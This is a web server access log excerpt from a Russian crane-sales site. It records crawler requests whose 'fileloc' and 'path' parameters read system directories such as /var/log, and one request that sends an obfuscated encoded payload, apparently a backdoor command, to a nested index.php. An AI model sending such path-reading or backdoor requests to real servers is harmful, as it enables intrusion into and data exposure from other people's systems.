216.73.216.53 - - [04/Nov/2025:04:13:45 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FECDSA_verify.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 19706 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:13:45 +1000] "GET /1331360?path=//var/log HTTP/1.0" 200 141086 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:13:48 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman7%2Flibmd.7.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman7 HTTP/1.0" 200 15266 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:13:51 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FSHA384_Final.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 18268 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:13:54 +1000] "GET /1076656?path=//var/run HTTP/1.0" 200 74347 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [04/Nov/2025:04:11:02 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323139373036322p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323139333436322q6133336137643765656532326336653230376262303435653962623239663530222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [04/Nov/2025:04:13:54 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2Ffgetfilecon_raw.3.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 12491 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:13:57 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FX509_NAME_print_ex_fp.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 19033 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:13:58 +1000] "GET /1179728?path=//sys/bus HTTP/1.0" 200 53163 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:14:00 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2Fselinux_homedir_context_path.3.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 12538 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.76.164 - - [04/Nov/2025:04:14:02 +1000] "GET /news/uchastie-v-vystake-transrussia?fileloc=/home/region-gk.ru/data/www/new.region-gk.ru/wp-comments-post.php?shopdetail/54226544.html HTTP/1.0" 200 209420 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
